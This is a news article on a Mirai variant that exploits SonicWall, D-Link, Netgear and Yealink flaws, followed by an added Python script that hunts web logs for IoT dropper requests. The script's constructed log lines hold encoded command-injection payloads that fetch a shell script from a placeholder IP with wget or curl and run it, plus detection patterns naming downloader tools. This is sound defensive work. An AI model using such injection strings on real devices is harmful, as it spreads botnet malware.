Security researchers from Palo Alto Networks have discovered another Mirai variant that is targeting new IoT vulnerabilities.
Researchers from Unit 42, the threat intelligence team of Palo Alto Networks, observed a wave of attacks beginning on Feb 16th, 2021 that, over the course of the campaign, leveraged vulnerabilities including:
VisualDoor (a SonicWall SSL-VPN exploit).
CVE-2020-25506 (a command-injection exploit for the D-Link DNS-320 NAS).
CVE-2020-26919 (a Netgear ProSAFE Plus exploit).
Possibly CVE-2019-19356 (a Netis WF2419 wireless router exploit).
Three other IoT vulnerabilities yet to be identified.
“Upon successful exploitation, the attackers try to download a malicious shell script, which contains further infection behaviors such as downloading and executing Mirai variants and brute-forcers,” wrote the Unit 42 researchers in a blog post.
The researchers found that one of the IPs involved in the attack was updated on Feb 23rd to take advantage of two newer vulnerabilities, CVE-2021-27561 and CVE-2021-27562, in the Yealink Device Management (DM) platform; both allow an unauthenticated attacker to run commands on the server with root privileges.
On March 13th, Unit 42 detected the addition of a further exploit, this one for CVE-2020-26919, the ProSAFE Plus vulnerability affecting NETGEAR JGS516PE switches.
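The post-exploitation chain described above (an injected command that fetches a shell script from a staging host, makes it executable and runs it) leaves a recognisable fingerprint in the web logs of the targeted device or of any honeypot in front of it. The following hunting script is an added example and is not code from Unit 42 or from the article; the access-log lines it scans are constructed, the IPs and paths in them are invented, and the query strings are generic command-injection shapes rather than the real exploit payloads for any of the CVEs named above. It URL-decodes each request target, scores it against the stages of a typical IoT dropper one-liner, and collects the staging hosts so they can be pivoted on or blocked.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines in Apache/nginx "combined" format.
# Hosts, IPs, paths and file names are invented for this example; the query
# strings are generic command-injection shapes, NOT the real exploit payloads
# for the CVEs discussed in the article.
SAMPLE_LOG = r'''
203.0.113.7 - - [16/Feb/2021:10:02:11 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [16/Feb/2021:10:03:45 +0000] "GET /cgi-bin/device.cgi?opt=%3Bwget%20http%3A%2F%2F198.51.100.23%2Fbins%2Fx.sh%20-O%20%2Ftmp%2Fx.sh%3Bchmod%20777%20%2Ftmp%2Fx.sh%3B%2Ftmp%2Fx.sh HTTP/1.1" 500 0 "-" "curl/7.64.0"
203.0.113.9 - - [16/Feb/2021:10:03:46 +0000] "POST /api/login HTTP/1.1" 200 87 "-" "curl/7.64.0"
198.51.100.40 - - [16/Feb/2021:10:05:02 +0000] "GET /setup.cgi?host=%24%28curl%20-s%20http%3A%2F%2F198.51.100.23%2Fb.sh%20%7C%20sh%29 HTTP/1.1" 404 0 "-" "python-requests/2.25"
203.0.113.11 - - [16/Feb/2021:10:06:00 +0000] "GET /docs?q=how+to+use+wget HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
'''

LOG_LINE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Stages of the dropper one-liner the article describes: the injected command
# fetches a shell script from a staging host, makes it executable and runs it;
# that script then pulls the Mirai binaries and brute-forcers.
SHELL_META = re.compile(r'[;|`]|\$\(')
DOWNLOADER = re.compile(r'\b(?:wget|curl|tftp|ftpget)\b', re.I)
RAW_IP_URL = re.compile(r'https?://(?P<host>\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?/\S*', re.I)
EXEC_STAGE = re.compile(
    r'chmod\s+(?:[0-7]{3,4}|\+x)\b'      # chmod 777 x.sh / chmod +x x.sh
    r'|\|\s*(?:ba)?sh\b'                 # curl ... | sh
    r'|[;&]\s*/tmp/\S+'                  # ;/tmp/x.sh
    r'|\b(?:ba)?sh\s+/tmp/\S+',          # sh /tmp/x.sh
    re.I,
)


def decode_target(target):
    """Percent-decode the request target twice: droppers are often double-encoded
    to slip past naive filters, and decoding an already-clean string is harmless."""
    return unquote_plus(unquote_plus(target))


def indicators_for(target):
    """Return the set of dropper indicators present in a request target."""
    decoded = decode_target(target)
    found = set()
    if SHELL_META.search(decoded):
        found.add('shell_metachar')
    if DOWNLOADER.search(decoded):
        found.add('downloader')
    if RAW_IP_URL.search(decoded):
        found.add('raw_ip_url')
    if EXEC_STAGE.search(decoded):
        found.add('exec_stage')
    return found


def is_dropper_request(target):
    """A downloader alone is not enough (people do search for 'wget'); require a
    command-injection metacharacter plus either a fetch-from-raw-IP or an execute step."""
    ind = indicators_for(target)
    return bool('shell_metachar' in ind and 'downloader' in ind
                and ({'raw_ip_url', 'exec_stage'} & ind))


def hunt_dropper_requests(log_text):
    """Scan combined-format log text and return one record per dropper attempt."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m or not is_dropper_request(m['target']):
            continue
        decoded = decode_target(m['target'])
        url = RAW_IP_URL.search(decoded)
        hits.append({
            'src': m['src'],
            'time': m['time'],
            'status': int(m['status']),
            'decoded': decoded,
            'indicators': sorted(indicators_for(m['target'])),
            'payload_host': url['host'] if url else None,
        })
    return hits


def payload_hosts(hits):
    """Staging hosts worth pivoting on or blocking. The article notes the attacker
    IPs being updated over time, so re-run this as new logs arrive."""
    return {h['payload_host'] for h in hits if h['payload_host']}


if __name__ == '__main__':
    hits = hunt_dropper_requests(SAMPLE_LOG)
    for h in hits:
        print(h['time'], h['src'], h['indicators'], h['decoded'])
    print('staging hosts:', payload_hosts(hits))
```

Note that the HTTP status is deliberately not used as a filter: a 404 or 500 on the injected request says nothing about whether the command ran, because many embedded CGI handlers execute the injected string before they fail. The status is kept in the record so an analyst can correlate it with outbound connections from the device to the staging host, which is the real confirmation of compromise.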
“The IoT realm remains an easily accessible target for attackers. Many vulnerabilities are very easy to exploit and could, in some cases, have catastrophic consequences,” the researchers added.
In this case, compromised devices download Mirai binaries, which enlist them in a larger IoT botnet capable of launching distributed denial-of-service (DDoS) attacks at devastating scale.
Mirai caused widespread chaos in 2016 when it hit DNS provider Dyn (since acquired by Oracle) and disrupted popular services including PayPal, Spotify, PlayStation Network, Xbox Live, Reddit, Amazon, GitHub, and many others. Over 100,000 devices are estimated to have been involved in the attack, whose traffic reportedly reached 1.2 Tbps.
Given the rapid proliferation of IoT devices, with IDC estimating there will be 41.6 billion connected IoT devices by 2025, and their often weak security, future attacks could well dwarf the one carried out against Dyn.